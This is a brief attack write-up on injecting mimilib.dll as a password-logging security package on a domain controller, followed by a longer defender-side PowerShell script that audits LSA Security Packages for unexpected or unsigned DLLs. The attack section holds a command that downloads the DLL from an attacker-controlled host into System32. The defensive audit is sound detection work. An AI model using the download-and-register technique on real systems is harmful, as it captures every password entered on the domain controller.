The idea behind this attack is to inject a malicious DLL that logs every password entered on the system.

First, drop mimilib.dll into the System32 directory on the domain controller (DC):

```powershell
# wget is a PowerShell alias for Invoke-WebRequest; this fetches the DLL from the attacker-controlled host
wget -Uri http://172.16.100.22/mimilib.dll -OutFile mimilib.dll
```


Now let's modify the registry keys.
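The two steps above (a foreign DLL in System32 plus a registry change that makes LSA load it) are exactly what a defender audits on a domain controller. The following PowerShell is an added defender-side check, not part of the original write-up and not mimikatz/mimilib code: it reads the LSA "Security Packages" registration value, flags any entry that is not in a known-good baseline, and verifies whether the DLL each entry resolves to in System32 is Microsoft-signed. The baseline list is an illustrative assumption; take the authoritative list from a clean reference build of the same Windows version.

```powershell
# Added example: audit LSA Security Packages for unexpected or unsigned SSP DLLs.
# Assumes it is run as an administrator on the host being audited.
# $baseline is an illustrative assumption, not an authoritative Microsoft list.

$lsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$baseline = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')

function Get-SspAudit {
    # Security Packages is REG_MULTI_SZ; each entry is a DLL base name resolved from System32
    $packages = (Get-ItemProperty -Path $lsaKey -Name 'Security Packages' -ErrorAction Stop).'Security Packages'

    foreach ($pkg in @($packages)) {
        if ([string]::IsNullOrWhiteSpace($pkg)) { continue }
        $name = $pkg.Trim()

        # Anything outside the baseline deserves a look even if it happens to be signed
        $status = if ($baseline -contains $name) { 'baseline' } else { 'UNEXPECTED' }

        # Resolve the entry to the file LSA would actually load and check its signature
        $dll = Join-Path $env:SystemRoot "System32\$name.dll"
        if (Test-Path $dll) {
            $sig    = Get-AuthenticodeSignature -FilePath $dll
            $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<unsigned>' }
            $trust  = if ($sig.Status -eq 'Valid' -and $signer -like '*Microsoft*') { 'microsoft-signed' } else { 'NOT microsoft-signed' }
        } else {
            $signer = '<file missing>'
            $trust  = 'NOT microsoft-signed'
        }

        [pscustomobject]@{
            Package = $name
            Status  = $status
            Trust   = $trust
            Dll     = $dll
            Signer  = $signer
        }
    }
}

# Print the audit; rows marked UNEXPECTED or NOT microsoft-signed are the ones to investigate
Get-SspAudit | Format-Table -AutoSize
```

Because LSA only loads newly registered packages at the next boot, the registry value can be changed well before the DLL becomes active, so this check belongs in a scheduled baseline comparison rather than a one-off run; pairing it with a file-creation alert on System32 for non-Microsoft-signed DLLs catches the first step of the page's procedure independently of the second.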